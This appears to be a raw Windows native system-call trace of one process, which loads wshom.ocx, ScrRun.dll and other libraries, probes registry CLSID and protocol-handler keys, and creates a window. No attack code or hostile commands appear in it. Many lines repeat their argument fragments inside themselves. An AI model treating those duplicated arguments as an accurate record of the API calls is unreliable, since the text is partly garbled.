 02915   456   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}"}, ... 344, ) }, ... 344, ) == 0x0
 02916   456   NtQueryKey  (346, Name, 392, ... {Name= (346, Name, 392, ... {Name="\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}B"}, 162, ) }, 162, ) == 0x0
 02917   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 02918   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 352, ) == 0x0
 02919   456   NtQueryInformationToken  (352, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 02920   456   NtClose  (352, ... ) == 0x0
 02921   456   NtOpenKey  (0x2000000, {24, 0, 0x40, 0, 0,  (0x2000000, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02922   456   NtQueryValueKey  (346,  (346, "AppID", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02923   456   NtClose  (346, ... ) == 0x0
 02924   456   NtClose  (350, ... ) == 0x0
 02925   456   NtQueryKey  (90, Name, 384, ... {Name= (90, Name, 384, ... {Name="\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_CLASSES9"}, 138, ) }, 138, ) == 0x0
 02926   456   NtOpenKey  (0x20019, {24, 90, 0x40, 0, 0,  (0x20019, {24, 90, 0x40, 0, 0, "CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02927   456   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}"}, ... 348, ) }, ... 348, ) == 0x0
 02928   456   NtClose  (350, ... ) == 0x0
 02929   456   NtQueryKey  (90, Name, 384, ... {Name= (90, Name, 384, ... {Name="\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_CLASSESD"}, 138, ) }, 138, ) == 0x0
 02930   456   NtOpenKey  (0x20019, {24, 90, 0x40, 0, 0,  (0x20019, {24, 90, 0x40, 0, 0, "CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02931   456   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}"}, ... 348, ) }, ... 348, ) == 0x0
 02932   456   NtQueryKey  (350, Name, 384, ... {Name= (350, Name, 384, ... {Name="\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}B"}, 162, ) }, 162, ) == 0x0
 02933   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 02934   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 344, ) == 0x0
 02935   456   NtQueryInformationToken  (344, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 02936   456   NtClose  (344, ... ) == 0x0
 02937   456   NtOpenKey  (0x2000000, {24, 0, 0x40, 0, 0,  (0x2000000, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\InprocServer32"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02938   456   NtOpenKey  (0x2000000, {24, 350, 0x40, 0, 0,  (0x2000000, {24, 350, 0x40, 0, 0, "InprocServer32"}, ... 344, ) }, ... 344, ) == 0x0
 02939   456   NtQueryKey  (346, Name, 392, ... {Name= (346, Name, 392, ... {Name="\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\InProcServer32"}, 192, ) }, 192, ) == 0x0
 02940   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 02941   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 352, ) == 0x0
 02942   456   NtQueryInformationToken  (352, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 02943   456   NtClose  (352, ... ) == 0x0
 02944   456   NtOpenKey  (0x2000000, {24, 0, 0x40, 0, 0,  (0x2000000, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\InProcServer32"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02945   456   NtQueryValueKey  (346,  (346, "ThreadingModel", Partial, 144, ... TitleIdx=0, Type=1, Data="A\0p\0a\0r\0t\0m\0e\0n\0t\0\0\0"}, 32, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (346, "ThreadingModel", Partial, 144, ... TitleIdx=0, Type=1, Data="A\0p\0a\0r\0t\0m\0e\0n\0t\0\0\0"}, 32, ) }, 32, ) == 0x0
 02946   456   NtClose  (346, ... ) == 0x0
 02947   456   NtClose  (350, ... ) == 0x0
 02948   456   NtQueryKey  (90, Name, 384, ... {Name= (90, Name, 384, ... {Name="\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_CLASSES9"}, 138, ) }, 138, ) == 0x0
 02949   456   NtOpenKey  (0x20019, {24, 90, 0x40, 0, 0,  (0x20019, {24, 90, 0x40, 0, 0, "CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02950   456   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}"}, ... 348, ) }, ... 348, ) == 0x0
 02951   456   NtQueryKey  (350, Name, 384, ... {Name= (350, Name, 384, ... {Name="\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}B"}, 162, ) }, 162, ) == 0x0
 02952   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 02953   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 344, ) == 0x0
 02954   456   NtQueryInformationToken  (344, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 02955   456   NtClose  (344, ... ) == 0x0
 02956   456   NtOpenKey  (0x1, {24, 0, 0x40, 0, 0,  (0x1, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\TreatAs"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02957   456   NtOpenKey  (0x1, {24, 350, 0x40, 0, 0,  (0x1, {24, 350, 0x40, 0, 0, "TreatAs"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02958   456   NtClose  (350, ... ) == 0x0
 02959   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\System32\wshom.ocx"}, 1234876, ... ) }, 1234876, ... ) == 0x0
 02960   456   NtOpenFile  (0x100020, {24, 0, 0x40, 0, 0,  (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\System32\wshom.ocx"}, 5, 96, ... 348, {status=0x0, info=1}, ) }, 5, 96, ... 348, {status=0x0, info=1}, ) == 0x0
 02961   456   NtCreateSection  (0xe, 0x0, 0x0, 16, 134217728, 348, ... 344, ) == 0x0
 02962   456   NtClose  (348, ... ) == 0x0
 02963   456   NtMapViewOfSection  (344, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 16, ... (0x1020000), 0x0, 106496, ) == 0x0
 02964   456   NtClose  (344, ... ) == 0x0
 02965   456   NtUnmapViewOfSection  (-1, 0x1020000, ... ) == 0x0
 02966   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\System32\wshom.ocx"}, 1235192, ... ) }, 1235192, ... ) == 0x0
 02967   456   NtOpenFile  (0x100020, {24, 0, 0x40, 0, 0,  (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\System32\wshom.ocx"}, 5, 96, ... 344, {status=0x0, info=1}, ) }, 5, 96, ... 344, {status=0x0, info=1}, ) == 0x0
 02968   456   NtCreateSection  (0xf, 0x0, 0x0, 16, 16777216, 344, ... 348, ) == 0x0
 02969   456   NtQuerySection  (348, Image, 48, ... {section info, class 1, size 48}, 0x0, ) == 0x0
 02970   456   NtClose  (344, ... ) == 0x0
 02971   456   NtMapViewOfSection  (348, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x58430000), 0x0, 102400, ) == 0x0
 02972   456   NtClose  (348, ... ) == 0x0
 02973   456   NtOpenSection  (0xe, {24, 8, 0x40, 0, 0,  (0xe, {24, 8, 0x40, 0, 0, "WINSPOOL.DRV"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02974   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\System32\WINSPOOL.DRV"}, 1234408, ... ) }, 1234408, ... ) == 0x0
 02975   456   NtOpenFile  (0x100020, {24, 0, 0x40, 0, 0,  (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\System32\WINSPOOL.DRV"}, 5, 96, ... 348, {status=0x0, info=1}, ) }, 5, 96, ... 348, {status=0x0, info=1}, ) == 0x0
 02976   456   NtCreateSection  (0xf, 0x0, 0x0, 16, 16777216, 348, ... 344, ) == 0x0
 02977   456   NtQuerySection  (344, Image, 48, ... {section info, class 1, size 48}, 0x0, ) == 0x0
 02978   456   NtClose  (348, ... ) == 0x0
 02979   456   NtMapViewOfSection  (344, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x73000000), 0x0, 143360, ) == 0x0
 02980   456   NtClose  (344, ... ) == 0x0
 02981   456   NtProtectVirtualMemory  (-1, (0x5843c000), 788, 4, ... (0x5843c000), 4096, 2, ) == 0x0
 02982   456   NtProtectVirtualMemory  (-1, (0x5843c000), 4096, 2, ... (0x5843c000), 4096, 4, ) == 0x0
 02983   456   NtFlushInstructionCache  (-1, 1480835072, 788, ... ) == 0x0
 02984   456   NtProtectVirtualMemory  (-1, (0x5843c000), 788, 4, ... (0x5843c000), 4096, 2, ) == 0x0
 02985   456   NtProtectVirtualMemory  (-1, (0x5843c000), 4096, 2, ... (0x5843c000), 4096, 4, ) == 0x0
 02986   456   NtFlushInstructionCache  (-1, 1480835072, 788, ... ) == 0x0
 02987   456   NtProtectVirtualMemory  (-1, (0x5843c000), 788, 4, ... (0x5843c000), 4096, 2, ) == 0x0
 02988   456   NtProtectVirtualMemory  (-1, (0x5843c000), 4096, 2, ... (0x5843c000), 4096, 4, ) == 0x0
 02989   456   NtFlushInstructionCache  (-1, 1480835072, 788, ... ) == 0x0
 02990   456   NtProtectVirtualMemory  (-1, (0x5843c000), 788, 4, ... (0x5843c000), 4096, 2, ) == 0x0
 02991   456   NtProtectVirtualMemory  (-1, (0x5843c000), 4096, 2, ... (0x5843c000), 4096, 4, ) == 0x0
 02992   456   NtFlushInstructionCache  (-1, 1480835072, 788, ... ) == 0x0
 02993   456   NtProtectVirtualMemory  (-1, (0x5843c000), 788, 4, ... (0x5843c000), 4096, 2, ) == 0x0
 02994   456   NtProtectVirtualMemory  (-1, (0x5843c000), 4096, 2, ... (0x5843c000), 4096, 4, ) == 0x0
 02995   456   NtFlushInstructionCache  (-1, 1480835072, 788, ... ) == 0x0
 02996   456   NtProtectVirtualMemory  (-1, (0x5843c000), 788, 4, ... (0x5843c000), 4096, 2, ) == 0x0
 02997   456   NtProtectVirtualMemory  (-1, (0x5843c000), 4096, 2, ... (0x5843c000), 4096, 4, ) == 0x0
 02998   456   NtFlushInstructionCache  (-1, 1480835072, 788, ... ) == 0x0
 02999   456   NtProtectVirtualMemory  (-1, (0x5843c000), 788, 4, ... (0x5843c000), 4096, 2, ) == 0x0
 03000   456   NtProtectVirtualMemory  (-1, (0x5843c000), 4096, 2, ... (0x5843c000), 4096, 4, ) == 0x0
 03001   456   NtFlushInstructionCache  (-1, 1480835072, 788, ... ) == 0x0
 03002   456   NtOpenSection  (0xe, {24, 8, 0x40, 0, 0,  (0xe, {24, 8, 0x40, 0, 0, "MPR.dll"}, ... 344, ) }, ... 344, ) == 0x0
 03003   456   NtMapViewOfSection  (344, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x71b20000), 0x0, 69632, ) == 0x0
 03004   456   NtClose  (344, ... ) == 0x0
 03005   456   NtProtectVirtualMemory  (-1, (0x5843c000), 788, 4, ... (0x5843c000), 4096, 2, ) == 0x0
 03006   456   NtProtectVirtualMemory  (-1, (0x5843c000), 4096, 2, ... (0x5843c000), 4096, 4, ) == 0x0
 03007   456   NtFlushInstructionCache  (-1, 1480835072, 788, ... ) == 0x0
 03008   456   NtOpenSection  (0xe, {24, 8, 0x40, 0, 0,  (0xe, {24, 8, 0x40, 0, 0, "ScrRun.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03009   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\System32\ScrRun.dll"}, 1234408, ... ) }, 1234408, ... ) == 0x0
 03010   456   NtOpenFile  (0x100020, {24, 0, 0x40, 0, 0,  (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\System32\ScrRun.dll"}, 5, 96, ... 344, {status=0x0, info=1}, ) }, 5, 96, ... 344, {status=0x0, info=1}, ) == 0x0
 03011   456   NtCreateSection  (0xf, 0x0, 0x0, 16, 16777216, 344, ... 348, ) == 0x0
 03012   456   NtQuerySection  (348, Image, 48, ... {section info, class 1, size 48}, 0x0, ) == 0x0
 03013   456   NtClose  (344, ... ) == 0x0
 03014   456   NtMapViewOfSection  (348, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x735a0000), 0x0, 147456, ) == 0x0
 03015   456   NtClose  (348, ... ) == 0x0
 03016   456   NtProtectVirtualMemory  (-1, (0x5843c000), 788, 4, ... (0x5843c000), 4096, 2, ) == 0x0
 03017   456   NtProtectVirtualMemory  (-1, (0x5843c000), 4096, 2, ... (0x5843c000), 4096, 4, ) == 0x0
 03018   456   NtFlushInstructionCache  (-1, 1480835072, 788, ... ) == 0x0
 03019   456   NtProtectVirtualMemory  (-1, (0x5843c000), 788, 4, ... (0x5843c000), 4096, 2, ) == 0x0
 03020   456   NtProtectVirtualMemory  (-1, (0x5843c000), 4096, 2, ... (0x5843c000), 4096, 4, ) == 0x0
 03021   456   NtFlushInstructionCache  (-1, 1480835072, 788, ... ) == 0x0
 03022   456   NtQuerySystemInformation  (Basic, 44, ... {Unknown=0,MaximumIncrement=156250,PhysicalPageSize=0x1000,NumberOfPhysicalPages=0xff7c,LowestPhysicalPage=0x1,HighestPhysicalPage=0xffff,AllocationGranularity=0x10000,LowestUserAddress=0x10000,HighestUserAddress=0x7ffeffff,ActiveProcessors=1,NumberProcessors=1,}, 0x0, ) == 0x0
 03023   456   NtAllocateVirtualMemory  (-1, 0, 0, 65536, 8192, 4, ... 16908288, 65536, ) == 0x0
 03024   456   NtAllocateVirtualMemory  (-1, 16908288, 0, 4096, 4096, 4, ... 16908288, 4096, ) == 0x0
 03025   456   NtAllocateVirtualMemory  (-1, 16912384, 0, 8192, 4096, 4, ... 16912384, 8192, ) == 0x0
 03026   456   NtCreateSemaphore  (0x1f0003, 0x0, 1, 1, ... 348, ) == 0x0
 03027   456   NtCreateEvent  (0x1f0003, 0x0, 0, 0, ... 344, ) == 0x0
 03028   456   NtOpenKey  (0x20019, {24, 48, 0x40, 0, 0,  (0x20019, {24, 48, 0x40, 0, 0, "system\CurrentControlSet\control\NetworkProvider\HwOrder"}, ... 352, ) }, ... 352, ) == 0x0
 03029   456   NtNotifyChangeKey  (352, 344, 0, 0, 2011390432, 4, 0, 0, 0, 1, ... ) == 0x103
 03030   456   NtQueryInformationProcess  (-1, 28, 4, ... {process info, class 28, size 4}, 0x0, ) == 0x0
 03031   456   NtCreateSemaphore  (0x100003, 0x0, 0, 2147483647, ... 356, ) == 0x0
 03032   456   NtCreateSemaphore  (0x100003, 0x0, 0, 2147483647, ... 360, ) == 0x0
 03033   456   NtWaitForSingleObject  (16, 0, 0x0, ... ) == STATUS_ACCESS_DENIED
 03034   456   NtReleaseMutant  (16, ...
 03035   456   NtContinue  (-130580344, 0, ...
 03034   456   NtReleaseMutant  ... ) == STATUS_MUTANT_NOT_OWNED
 03036   456   NtQueryDefaultLocale  (1, 1233860, ... ) == 0x0
 03037   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\System32\wshENU.DLL"}, 1231852, ... ) }, 1231852, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03038   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\System32\wshENU.DLL"}, 1232168, ... ) }, 1232168, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03039   456   NtOpenSection  (0xe, {24, 8, 0x40, 0, 0,  (0xe, {24, 8, 0x40, 0, 0, "wshENU.DLL"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03040   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\u:\work\wshENU.DLL"}, 1232160, ... ) }, 1232160, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03041   456   NtQueryAttributesFile  ({24, 112, 0x40, 0, 0,  ({24, 112, 0x40, 0, 0, "wshENU.DLL"}, 1232160, ... ) }, 1232160, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03042   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\System32\wshENU.DLL"}, 1232160, ... ) }, 1232160, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03043   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system\wshENU.DLL"}, 1232160, ... ) }, 1232160, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03044   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\wshENU.DLL"}, 1232160, ... ) }, 1232160, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03045   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\wshENU.DLL"}, 1232160, ... ) }, 1232160, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03046   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\wshENU.DLL"}, 1232160, ... ) }, 1232160, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03047   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\System32\Wbem\wshENU.DLL"}, 1232160, ... ) }, 1232160, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03048   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\System32\wshEN.DLL"}, 1231852, ... ) }, 1231852, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03049   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\System32\wshEN.DLL"}, 1232168, ... ) }, 1232168, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03050   456   NtOpenSection  (0xe, {24, 8, 0x40, 0, 0,  (0xe, {24, 8, 0x40, 0, 0, "wshEN.DLL"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03051   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\u:\work\wshEN.DLL"}, 1232160, ... ) }, 1232160, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03052   456   NtQueryAttributesFile  ({24, 112, 0x40, 0, 0,  ({24, 112, 0x40, 0, 0, "wshEN.DLL"}, 1232160, ... ) }, 1232160, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03053   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\System32\wshEN.DLL"}, 1232160, ... ) }, 1232160, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03054   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system\wshEN.DLL"}, 1232160, ... ) }, 1232160, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03055   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\wshEN.DLL"}, 1232160, ... ) }, 1232160, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03056   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\wshEN.DLL"}, 1232160, ... ) }, 1232160, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03057   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\wshEN.DLL"}, 1232160, ... ) }, 1232160, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03058   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\System32\Wbem\wshEN.DLL"}, 1232160, ... ) }, 1232160, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03059   456   NtWaitForSingleObject  (16, 0, 0x0, ... ) == STATUS_ACCESS_DENIED
 03060   456   NtReleaseMutant  (16, ...
 03061   456   NtContinue  (-130580344, 0, ...
 03060   456   NtReleaseMutant  ... ) == STATUS_MUTANT_NOT_OWNED
 03062   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\System32\wshENU.DLL"}, 1231852, ... ) }, 1231852, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03063   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\System32\wshENU.DLL"}, 1232168, ... ) }, 1232168, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03064   456   NtOpenSection  (0xe, {24, 8, 0x40, 0, 0,  (0xe, {24, 8, 0x40, 0, 0, "wshENU.DLL"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03065   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\u:\work\wshENU.DLL"}, 1232160, ... ) }, 1232160, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03066   456   NtQueryAttributesFile  ({24, 112, 0x40, 0, 0,  ({24, 112, 0x40, 0, 0, "wshENU.DLL"}, 1232160, ... ) }, 1232160, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03067   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\System32\wshENU.DLL"}, 1232160, ... ) }, 1232160, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03068   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system\wshENU.DLL"}, 1232160, ... ) }, 1232160, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03069   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\wshENU.DLL"}, 1232160, ... ) }, 1232160, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03070   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\wshENU.DLL"}, 1232160, ... ) }, 1232160, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03071   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\wshENU.DLL"}, 1232160, ... ) }, 1232160, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03072   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\System32\Wbem\wshENU.DLL"}, 1232160, ... ) }, 1232160, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03073   456   NtUserRegisterClassExWOW  (1238388, 1238464, 1238480, 1238452, 0, 386, 0, ... ) == 0x810dc0cc
 03074   456   NtUserCreateWindowEx  (-2147483648, 1238488, 1238300, 0x0, 0, 0, 0, 0, 0, -3, 0, 1980694528, 0, 1073742848, 0, ...
 03075   456   NtUserMessageCall  (0x200c6, WM_NCCREATE, 0x0, 0x12e02c, 0, 670, 1, ... ) == 0x1
 03076   456   NtUserMessageCall  (0x200c6, WM_NCCALCSIZE, 0x0, 0x12e07c, 0, 670, 1, ... ) == 0x0
 03077   456   NtUserGetClassName  (65558, 0, 1236008, ... ) == 0x7
 03078   456   NtUserSetProp  (131270, 43288, -2, ... ) == 0x1
 03074   456   NtUserCreateWindowEx  ... ) == 0x200c6
 03079   456   NtAllocateVirtualMemory  (-1, 1458176, 0, 12288, 4096, 4, ... 1458176, 12288, ) == 0x0
 03080   456   NtQueryKey  (90, Name, 384, ... {Name= (90, Name, 384, ... {Name="\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_CLASSES"}, 138, ) }, 138, ) == 0x0
 03081   456   NtOpenKey  (0x20019, {24, 90, 0x40, 0, 0,  (0x20019, {24, 90, 0x40, 0, 0, "PROTOCOLS\Name-Space Handler\"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03082   456   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Classes\PROTOCOLS\Name-Space Handler"}, ... 364, ) }, ... 364, ) == 0x0
 03083   456   NtQueryKey  (90, Name, 384, ... {Name= (90, Name, 384, ... {Name="\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_CLASSESm"}, 138, ) }, 138, ) == 0x0
 03084   456   NtOpenKey  (0x20019, {24, 90, 0x40, 0, 0,  (0x20019, {24, 90, 0x40, 0, 0, "PROTOCOLS\Name-Space Handler\http\"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03085   456   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Classes\PROTOCOLS\Name-Space Handler\http"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03086   456   NtQueryKey  (90, Name, 384, ... {Name= (90, Name, 384, ... {Name="\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_CLASSESm"}, 138, ) }, 138, ) == 0x0
 03087   456   NtOpenKey  (0x20019, {24, 90, 0x40, 0, 0,  (0x20019, {24, 90, 0x40, 0, 0, "PROTOCOLS\Name-Space Handler\*\"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03088   456   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Classes\PROTOCOLS\Name-Space Handler\*"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03089   456   NtClose  (366, ... ) == 0x0
 03090   456   NtOpenSection  (0xe, {24, 8, 0x40, 0, 0,  (0xe, {24, 8, 0x40, 0, 0, "mlang.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03091   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\u:\work\mlang.dll"}, 1236556, ... ) }, 1236556, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03092   456   NtQueryAttributesFile  ({24, 112, 0x40, 0, 0,  ({24, 112, 0x40, 0, 0, "mlang.dll"}, 1236556, ... ) }, 1236556, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03093   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\System32\mlang.dll"}, 1236556, ... ) }, 1236556, ... ) == 0x0
